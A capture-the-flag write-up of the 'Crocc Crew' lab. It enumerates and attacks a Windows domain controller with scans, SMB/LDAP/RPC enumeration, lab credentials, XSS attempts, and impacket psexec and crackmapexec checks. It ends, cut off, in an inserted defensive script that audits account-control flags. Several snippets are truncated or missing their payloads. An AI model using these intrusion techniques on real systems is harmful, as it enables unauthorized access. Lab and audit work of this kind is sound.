# Crocc Crew

## Recon to Foothold

Let's begin as always with a scan, first masscan:

```
rob:TryHackMe/ $ sudo masscan -p1-65535,U:1-65535 10.10.45.72 --rate=1000 -e tun0
[sudo] password for rob:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-08-18 12:24:43 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 49678/tcp on 10.10.45.72
Discovered open port 49669/tcp on 10.10.45.72
Discovered open port 49675/tcp on 10.10.45.72
Discovered open port 49711/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 49666/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 49674/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 53/udp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
```

Ok, given the number and type of ports discovered this looks like a Windows machine. No UDP ports were discovered apart from DNS (53), so for now at least we can ignore UDP.

And now nmap for detail:

```
rob:TryHackMe/ $ nmap -A -T4 -v -p53,80,88,135,139,389,445,464,593,636,3268,3269,3389,9389 10.10.45.72
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 13:36 BST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating Ping Scan at 13:36
Scanning 10.10.45.72 [2 ports]
Completed Ping Scan at 13:36, 0.01s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:36
Completed Parallel DNS resolution of 1 host. at 13:36, 0.04s elapsed
Initiating Connect Scan at 13:36
Scanning 10.10.45.72 [14 ports]
Discovered open port 135/tcp on 10.10.45.72
Discovered open port 80/tcp on 10.10.45.72
Discovered open port 139/tcp on 10.10.45.72
Discovered open port 53/tcp on 10.10.45.72
Discovered open port 3389/tcp on 10.10.45.72
Discovered open port 445/tcp on 10.10.45.72
Discovered open port 389/tcp on 10.10.45.72
Discovered open port 464/tcp on 10.10.45.72
Discovered open port 9389/tcp on 10.10.45.72
Discovered open port 3269/tcp on 10.10.45.72
Discovered open port 88/tcp on 10.10.45.72
Discovered open port 636/tcp on 10.10.45.72
Discovered open port 593/tcp on 10.10.45.72
Discovered open port 3268/tcp on 10.10.45.72
Completed Connect Scan at 13:36, 0.02s elapsed (14 total ports)
Initiating Service scan at 13:36
Scanning 14 services on 10.10.45.72
Completed Service scan at 13:36, 6.64s elapsed (14 services on 1 host)
NSE: Script scanning 10.10.45.72.
Initiating NSE at 13:36
Completed NSE at 13:36, 40.09s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.39s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Nmap scan report for 10.10.45.72
Host is up (0.012s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-18 12:36:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: COOCTUS.CORP0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: COOCTUS
|   NetBIOS_Domain_Name: COOCTUS
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: COOCTUS.CORP
|   DNS_Computer_Name: DC.COOCTUS.CORP
|   Product_Version: 10.0.17763
|_  System_Time: 2021-08-18T12:36:20+00:00
| ssl-cert: Subject: commonName=DC.COOCTUS.CORP
| Issuer: commonName=DC.COOCTUS.CORP
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-06-07T02:37:18
| Not valid after:  2021-12-07T02:37:18
| MD5:   72be 3896 d880 1bc2 2455 1d55 33da 9300
|_SHA-1: bb1b c5bc 3aef ede9 3dc2 8b0d 0b00 c1d3 4371 19f4
|_ssl-date: 2021-08-18T12:37:00+00:00; +1s from scanner time.
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-08-18T12:36:25
|_  start_date: N/A

NSE: Script Post-scanning.
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Initiating NSE at 13:36
Completed NSE at 13:36, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.75 seconds
```

Before we dig into the website and the more complex ports, let's have a look at some of the simpler stuff, starting with SMB:

```
rob:TryHackMe/ $ smbclient -L 10.10.45.72 -U "" -N

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available
```

Ok then, it looks like we'll require some creds before that is of any potential use.

From our nmap scan we found a domain name, cooctus.corp, so let's see if we can query DNS:

```
rob:TryHackMe/ $ dig any cooctus.corp @10.10.45.72

; <<>> DiG 9.16.15-Debian <<>> any cooctus.corp @10.10.45.72
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<-
```

Nothing particularly useful there, let's try LDAP:

```
rob:TryHackMe/ $ ldapsearch -x -h 10.10.45.72 -D '' -b "DC=,DC="
# extended LDIF
#
# LDAPv3
# base ,DC= with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
```

No, this is looking for credentials too!
Let's try another way:

```
rob:CroccCrew/ $ ldapsearch -LLL -x -H ldap://dc.cooctus.corp -b '' -s base '(objectclass=*)'
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=COOCTUS,DC=CORP
ldapServiceName: COOCTUS.CORP:dc$@COOCTUS.CORP
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=COOCTUS,DC=CORP
schemaNamingContext: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=COOCTUS,DC=CORP
namingContexts: CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: CN=Schema,CN=Configuration,DC=COOCTUS,DC=CORP
namingContexts: DC=DomainDnsZones,DC=COOCTUS,DC=CORP
namingContexts: DC=ForestDnsZones,DC=COOCTUS,DC=CORP
isSynchronized: TRUE
highestCommittedUSN: 98342
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=COOCTUS,DC=CORP
dnsHostName: DC.COOCTUS.CORP
defaultNamingContext: DC=COOCTUS,DC=CORP
currentTime: 20210823235515.0Z
configurationNamingContext: CN=Configuration,DC=COOCTUS,DC=CORP
```

Ok, at first glance there is nothing useful there for us. Some googling though finds us a new (to me at least) tool that looks very handy, ldapdomaindump:

```
rob:CroccCrew/ $ ldapdomaindump -u 'Visitor' -p 'GuestLogin!' 10.10.145.144
[!] Username must include a domain, use: DOMAIN\username

rob:CroccCrew/ $ ldapdomaindump -u 'COOCTUS.CORP\Visitor' -p 'GuestLogin!' 10.10.145.144
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
```

This drops a number of files detailing computers, groups, policies, trusts, etc. An interesting one for us is the user table.

There's a lot of info here and nothing jumps out at me right now, but it's very readable; must remember this one!

Trying to enumerate RPC gives us nothing without authentication either:

```
rob:TryHackMe/ $ rpcinfo -p 10.10.45.72
10.10.45.72: RPC: Remote system error - Connection refused
```

And the same with rpcclient:

```
rob:CroccCrew/ $ rpcclient -U "" -N dc.cooctus.corp
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
```

If we try hunting through the commands available we do find one that returns an output:

```
rob:~/ $ rpcclient -U "" -N 10.10.245.246
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 0:3 (0x0:0x3)
SeLockMemoryPrivilege 0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 0:5 (0x0:0x5)
SeMachineAccountPrivilege 0:6 (0x0:0x6)
SeTcbPrivilege 0:7 (0x0:0x7)
SeSecurityPrivilege 0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 0:9 (0x0:0x9)
SeLoadDriverPrivilege 0:10 (0x0:0xa)
SeSystemProfilePrivilege 0:11 (0x0:0xb)
SeSystemtimePrivilege 0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 0:14 (0x0:0xe)
SeCreatePagefilePrivilege 0:15 (0x0:0xf)
SeCreatePermanentPrivilege 0:16 (0x0:0x10)
SeBackupPrivilege 0:17 (0x0:0x11)
SeRestorePrivilege 0:18 (0x0:0x12)
SeShutdownPrivilege 0:19 (0x0:0x13)
SeDebugPrivilege 0:20 (0x0:0x14)
SeAuditPrivilege 0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 0:22 (0x0:0x16)
SeChangeNotifyPrivilege 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 0:24 (0x0:0x18)
SeUndockPrivilege 0:25 (0x0:0x19)
SeSyncAgentPrivilege 0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 0:27 (0x0:0x1b)
SeManageVolumePrivilege 0:28 (0x0:0x1c)
SeImpersonatePrivilege 0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 0:31 (0x0:0x1f)
SeRelabelPrivilege 0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 0:33 (0x0:0x21)
SeTimeZonePrivilege 0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
```

So this would suggest that whatever service account is running the RPC service has interesting privileges like SeImpersonatePrivilege. If we can get in as this account we may be able to escalate our privileges from there. That's a big IF though! 😄

Let's check out the web server on port 80 next.

Ok, looking at the source shows us that this is a page made on webflow.io; there's nothing site specific here.
Let's see if we can enumerate the web server then with a directory buster:

```
rob:~/ $ gobuster dir --url http://10.10.245.246 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php,asp,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.245.246
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,asp,txt
[+] Timeout:                 10s
===============================================================
2021/09/23 18:52:06 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 5342323]
/robots.txt           (Status: 200) [Size: 70]
/Index.html           (Status: 200) [Size: 5342323]
/backdoor.php         (Status: 200) [Size: 529]
/Robots.txt           (Status: 200) [Size: 70]
/index.html           (Status: 200) [Size: 5342323]
===============================================================
2021/09/23 18:58:27 Finished
===============================================================
```

We found a robots.txt file that nmap didn't show, let's have a look at that:

```
rob:CroccCrew/ $ curl dc.cooctus.corp/robots.txt
User-Agent: *
Disallow: /robots.txt /db-config.bak /backdoor.php
```

Alright then, there's a couple of interesting files shown there: a backup of the database config perhaps, and what could be a backdoor of some type. Let's look a little closer at these:

```
rob:CroccCrew/ $ curl dc.cooctus.corp/db-config.bak
```

```php
connect_error) {
    die("Connection Failed: " . $conn->connect_error);
}
echo "Connected Successfully";
?>
```

Excellent, we appear to have found some credentials, C00ctusAdm1n:B4dt0th3b0n3, to a mysql database. Even if we can't access that from outside the box, we may find some credential reuse elsewhere.

Speaking of which, we have an open RDP port, let's see if it works there.

And no, nothing doing. Let's check the other file:

```
rob:CroccCrew/ $ curl dc.cooctus.corp/backdoor.php
```

```js
$('body').terminal({
    hello: function(what) {
        this.echo('Hello, ' + what + '. Wellcome to this terminal.');
    }
}, {
    greetings: 'CroccCrew :)'
});
```

Well, that does indeed look like a potential way in, let's check it out in a browser.

It takes a little trial and error, and looking at the curl output above, but we manage to get a response from this hello function. This appears to be taking arbitrary input from the user and returning it (possibly unsanitized) in the response.

We can mess with this a bit to see if we get any interesting responses:

```
hello
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 0!
Hello hello
Command 'Hello' Not Found!
hello hello\';echo('here's something fun')#
Error: JSON.parse: unterminated string at line 1 column 9 of the JSON data
```

Ok that's interesting, we have a JSON parser here. Not sure what we can make of it though! 😄

…and that is apparently nothing:

> jQuery Terminal Emulator is a plugin for creating command line interpreters in your applications. It can automatically call JSON-RPC service when a user types commands or you can provide your own function in which you can parse user commands

Some checking of the downloaded javascript files shows we are using jquery.terminal version 2.29.0, which was the very latest up until about 11 hours ago and has no known vulnerabilities according to the usual sources (cve.mitre.org, etc.).

But we are using jquery-3.3.1.min.js which does have some known issues. This version was released 2018/1/20 (from the release history) and is a couple of major updates behind the current 3.6.0. Most interesting for us though is the 3.5.0 release, for which the release notes read:

> Despite being a minor release, this update includes a breaking change that we had to make to fix a security issue (CVE-2020-11022)

If we check out this CVE we find something that sounds pretty useful in our situation:

> In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code

Some googling finds that this CVE is one of a pair; we also have CVE-2020-11023. For CVE-2020-11022 we find a possible exploit in the exploit-db, and for CVE-2020-11023 we find some more.

However when we try these we run into that argument number checker we saw earlier; the spaces are our enemies!

```
hello
[Arity] Wrong number of arguments. Function 'hello' expects 1 got 3!
```

And if we try to replace spaces with + or %20 we don't get any further:

```
hello
Hello, . Wellcome to this terminal.
hello
Hello, . Wellcome to this terminal.
```

But on second thought, since those methods are typically good for URL encoding, perhaps we'd be better off trying to use:

```
hello ^
```

However finishing this with a `;` converts automagically back to a space!

```
hello
```

We seem to get a little progress (maybe… at least a different response!) with escaping the spaces:

```
hello
hello
Hello, . Wellcome to this terminal.
hello
Hello, . Wellcome to this terminal.
hello "
Error: JSON.parse: bad escaped character at line 1 column 7 of the JSON data
```

So we can see that in at least the first two POCs the string is being accepted, but it appears that it is not being interpreted, simply returned.

Looking a little closer at the first (or second) output though we can see something odd:

```
hello
Hello, . Wellcome to this terminal.
```
For the space after src=x the backslash is gone and the space renders correctly. However for the space after img we can still see the backslash.

At this point we're grinding to a halt with this approach, let's see if we can find another avenue of attack.

On a hint from discord that remmina is not the best RDP client to use, let's see what we get if we use an alternative, rdesktop.

Ok, that does make a difference. Some googling suggests that your RDP client must be old enough to not support network level authentication (i.e. from WinXP or before), or you have to connect via a .rdp file that contains the option `enablecredsspsupport:i:0`. We're not using a .rdp file, so I guess it is really old!

We find another possible set of user credentials we can try, Visitor:GuestLogin!, but they won't work for RDP. Let's try them elsewhere then:

```
rob:~/ $ smbclient -L 10.10.245.246 -U 'Visitor'
Enter WORKGROUP\Visitor's password:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Home            Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```

Excellent, we can access an SMB share with these credentials, let's see what's in there:

```
rob:~/ $ smbclient //10.10.245.246/Home -U 'Visitor'
Enter WORKGROUP\Visitor's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Jun  8 20:42:53 2021
  ..                                  D        0  Tue Jun  8 20:42:53 2021
  user.txt                            A       17  Tue Jun  8 04:14:25 2021

		15587583 blocks of size 4096. 11417631 blocks available
smb: \> get user.txt
getting file \user.txt of size 17 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> !cat user.txt
THM{REDACTED}
```

And we've got our first flag, #1: THM{REDACTED}

C00ctusAdm1n:B4dt0th3b0n3

NB: we could also have used crackmapexec to test these credentials:

```
rob:CroccCrew/ $ crackmapexec smb 10.10.145.144 -u 'Visitor' -p 'GuestLogin!'
SMB         10.10.145.144   445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:COOCTUS.CORP) (signing:True) (SMBv1:False)
SMB         10.10.145.144   445    DC               [+] COOCTUS.CORP\Visitor:GuestLogin!
```

## From first creds to privileged RCE

So now, with a set of working SMB credentials, we have a few more options. We want to find usernames, so let's first try enum4linux:

```
rob:~/ $ enum4linux -u 'Visitor' -p 'GuestLogin!' -U 10.10.245.246
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 23 19:18:14 2021

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.245.246
RID Range ........ 500-550,1000-1050
Username ......... 'Visitor'
Password ......... 'GuestLogin!'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

 =====================================================
|    Enumerating Workgroup/Domain on 10.10.245.246    |
 =====================================================
[E] Can't find workgroup/domain

 ======================================
|    Session Check on 10.10.245.246    |
 ======================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.245.246 allows sessions using username 'Visitor', password 'GuestLogin!'
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name:

 ============================================
|    Getting domain SID for 10.10.245.246    |
 ============================================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: COOCTUS
Domain Sid: S-1-5-21-2062199590-3607821280-2073525473
[+] Host is part of a domain (not a workgroup)

 ==============================
|    Users on 10.10.245.246    |
 ==============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0xfda RID: 0x461 acb: 0x00000210 Account: admCroccCrew	Name: admCroccCrew	Desc: (null)
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xfe4 RID: 0x46b acb: 0x00000210 Account: Ben	Name: Ben	Desc: (null)
index: 0xfdd RID: 0x464 acb: 0x00000210 Account: cryillic	Name: cryillic	Desc: (null)
index: 0xfe5 RID: 0x46c acb: 0x00000210 Account: David	Name: David	Desc: (null)
index: 0xfe3 RID: 0x46a acb: 0x00000210 Account: evan	Name: evan	Desc: (null)
index: 0xfdb RID: 0x462 acb: 0x00000210 Account: Fawaz	Name: Fawaz	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfd9 RID: 0x460 acb: 0x00000210 Account: Howard	Name: Howard	Desc: (null)
index: 0xfd5 RID: 0x45c acb: 0x00000210 Account: Jeff	Name: Jeff	Desc: (null)
index: 0xfe1 RID: 0x468 acb: 0x00000210 Account: jon	Name: jon	Desc: (null)
index: 0xfdc RID: 0x463 acb: 0x00000210 Account: karen	Name: karen	Desc: (null)
index: 0xfe0 RID: 0x467 acb: 0x00000210 Account: kevin	Name: kevin	Desc: (null)
index: 0xf0f RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xfd4 RID: 0x45b acb: 0x00020010 Account: mark	Name: Mark	Desc: (null)
index: 0xfdf RID: 0x466 acb: 0x00000210 Account: pars	Name: paradox	Desc: (null)
index: 0xfe8 RID: 0x46e acb: 0x00040210 Account: password-reset	Name: reset	Desc: (null)
index: 0xfd6 RID: 0x45d acb: 0x00000210 Account: Spooks	Name: Spooks	Desc: (null)
index: 0xfd8 RID: 0x45f acb: 0x00000210 Account: Steve	Name: Steve	Desc: (null)
index: 0xfe2 RID: 0x469 acb: 0x00000210 Account: Varg	Name: varg	Desc: (null)
index: 0xfb8 RID: 0x455 acb: 0x00000210 Account: Visitor	Name: Cooctus Guest	Desc: (null)
index: 0xfde RID: 0x465 acb: 0x00000210 Account: yumeko	Name: yumeko	Desc: (null)
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 881.

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[Visitor] rid:[0x455]
user:[mark] rid:[0x45b]
user:[Jeff] rid:[0x45c]
user:[Spooks] rid:[0x45d]
user:[Steve] rid:[0x45f]
user:[Howard] rid:[0x460]
user:[admCroccCrew] rid:[0x461]
user:[Fawaz] rid:[0x462]
user:[karen] rid:[0x463]
user:[cryillic] rid:[0x464]
user:[yumeko] rid:[0x465]
user:[pars] rid:[0x466]
user:[kevin] rid:[0x467]
user:[jon] rid:[0x468]
user:[Varg] rid:[0x469]
user:[evan] rid:[0x46a]
user:[Ben] rid:[0x46b]
user:[David] rid:[0x46c]
user:[password-reset] rid:[0x46e]
enum4linux complete on Thu Sep 23 19:18:25 2021
```

Of these found usernames the one most likely to be the planted account must be #2: admCroccCrew

We can try psexec by impacket to see if we can get a shell from here:

```
rob:CroccCrew/ $ impacket-psexec 'COOCTUS.CORP/Visitor:GuestLogin!'@10.10.145.144 -dc-ip 10.10.145.144
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.145.144.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'Home' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
```

Unfortunately we do not have a writable share that can be used, so no joy! Sticking with the impacket tools though, can we do more with this?
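The `acb:` values in the enum4linux user listing above are the SAMR account-control bits (the same bits as the userAccountControl flags ldapdomaindump shows), and they already single out the account this box turns on: `password-reset` is the only entry carrying 0x00040000, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION, which is the TRUSTED_TO_AUTH_FOR_DELEGATION flag noted later in the LDAP dump. The following Python is an added example, not from the original post; it decodes those bits from a few lines copied from the output above (the sample text is constructed from them) and reports the settings an AD audit would flag.

```python
import re

# SAMR USER_ACCOUNT control bits (MS-SAMR 2.2.1.12); enum4linux prints them as "acb:".
ACB_FLAGS = {
    0x00000001: "ACCOUNT_DISABLED",
    0x00000002: "HOME_DIRECTORY_REQUIRED",
    0x00000004: "PASSWORD_NOT_REQUIRED",
    0x00000008: "TEMP_DUPLICATE_ACCOUNT",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000020: "MNS_LOGON_ACCOUNT",
    0x00000040: "INTERDOMAIN_TRUST_ACCOUNT",
    0x00000080: "WORKSTATION_TRUST_ACCOUNT",
    0x00000100: "SERVER_TRUST_ACCOUNT",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00000400: "ACCOUNT_AUTO_LOCKED",
    0x00000800: "ENCRYPTED_TEXT_PASSWORD_ALLOWED",
    0x00001000: "SMARTCARD_REQUIRED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00004000: "NOT_DELEGATED",
    0x00008000: "USE_DES_KEY_ONLY",
    0x00010000: "DONT_REQUIRE_PREAUTH",
    0x00020000: "PASSWORD_EXPIRED",
    0x00040000: "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION",
    0x00080000: "NO_AUTH_DATA_REQUIRED",
    0x00100000: "PARTIAL_SECRETS_ACCOUNT",
    0x00200000: "USE_AES_KEYS",
}

# Settings worth reporting on an enabled account, with the reason a reviewer would give.
RISKY = {
    "TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION": "constrained delegation with protocol transition (S4U2self allowed)",
    "TRUSTED_FOR_DELEGATION": "unconstrained delegation",
    "DONT_REQUIRE_PREAUTH": "Kerberos pre-authentication disabled",
    "PASSWORD_NOT_REQUIRED": "blank password permitted",
    "USE_DES_KEY_ONLY": "DES-only Kerberos keys",
    "DONT_EXPIRE_PASSWORD": "password never expires",
}

# One enum4linux user line: "index: 0x.. RID: 0x.. acb: 0x.. Account: name ..."
LINE_RE = re.compile(
    r"index:\s*0x[0-9a-f]+\s+RID:\s*(0x[0-9a-f]+)\s+acb:\s*(0x[0-9a-f]+)\s+Account:\s*(\S+)"
)


def decode_acb(acb):
    """Return the flag names set in an acb value, lowest bit first."""
    return [name for bit, name in sorted(ACB_FLAGS.items()) if acb & bit]


def parse_enum4linux_users(text):
    """Yield (account, rid, acb) for every user line in enum4linux output."""
    for m in LINE_RE.finditer(text):
        rid, acb, account = m.groups()
        yield account, int(rid, 16), int(acb, 16)


def audit(text):
    """Map each account to its findings: 'disabled', or the risky flags it carries.

    Disabled accounts are reported as such and not checked further; enabled
    accounts with no risky flag are left out of the result."""
    findings = {}
    for account, _rid, acb in parse_enum4linux_users(text):
        flags = decode_acb(acb)
        if "ACCOUNT_DISABLED" in flags:
            findings[account] = ["disabled"]
            continue
        hits = [f"{flag}: {RISKY[flag]}" for flag in flags if flag in RISKY]
        if hits:
            findings[account] = hits
    return findings


# Constructed sample: a subset of the user lines enum4linux printed above.
SAMPLE = """\
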